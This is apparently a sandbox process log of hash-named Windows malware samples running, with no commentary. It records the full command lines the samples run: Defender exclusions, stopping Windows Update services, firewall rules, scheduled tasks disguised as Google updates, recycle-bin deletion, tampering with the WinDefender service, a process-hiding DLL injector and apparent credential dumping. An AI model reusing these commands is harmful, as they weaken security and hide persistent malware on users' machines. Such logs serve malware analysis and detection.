C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1460

C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe

"C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe"

C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe

"C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe"

C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe

"C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1544

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1460

C:\Windows\SysWOW64\help.exe

"C:\Windows\SysWOW64\help.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1152

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1564

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1552

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1588

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\2023-11-22-05\135cdbfa671ffafa1c728ec8f270ca055d20e1669cd809d72273da202028a64f.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\nIdXvyexFmXwy.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nIdXvyexFmXwy" /XML "C:\Users\Admin\AppData\Local\Temp\tmpEECE.tmp"

C:\Users\Admin\Downloads\2023-11-22-05\135cdbfa671ffafa1c728ec8f270ca055d20e1669cd809d72273da202028a64f.exe

"C:\Users\Admin\Downloads\2023-11-22-05\135cdbfa671ffafa1c728ec8f270ca055d20e1669cd809d72273da202028a64f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1564

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1588

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1460

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1152

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1364

C:\Windows\SysWOW64\cmd.exe

cmd /c rd /s /q c:\$Recycle.bin

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120

C:\Windows\SysWOW64\cmd.exe

cmd /c rd /s /q c:\recycler

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1576

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c rd /s /q c:\$Recycle.bin

C:\Windows\SysWOW64\cmd.exe

cmd /c rd /s /q c:\recycler

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1152

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\cmd.exe

cmd /c rd /s /q c:\$Recycle.bin

C:\Windows\SysWOW64\cmd.exe

cmd /c rd /s /q c:\recycler

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1416

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1552

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1552

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1552

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1552

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe

C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe /stext "C:\Users\Admin\AppData\Local\Temp\eggdbczawjfttjodwuosrgpetravvpjylb"

C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe

C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe /stext "C:\Users\Admin\AppData\Local\Temp\pamobvj"

C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe

C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe /stext "C:\Users\Admin\AppData\Local\Temp\rczgcnuvxa"

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1424

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1564

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1328

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1620

C:\Windows\system32\compattelrunner.exe

C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1564

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1136

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1644

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1684

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1660

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1680

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5892 -ip 5892

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1712

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 5208

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1692

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1732

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1756

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1680

C:\Program Files\Mozilla Firefox\Firefox.exe

"C:\Program Files\Mozilla Firefox\Firefox.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1756

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1696

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1660

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1712

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1648

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1532

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1644

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1796

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1896

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1876

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

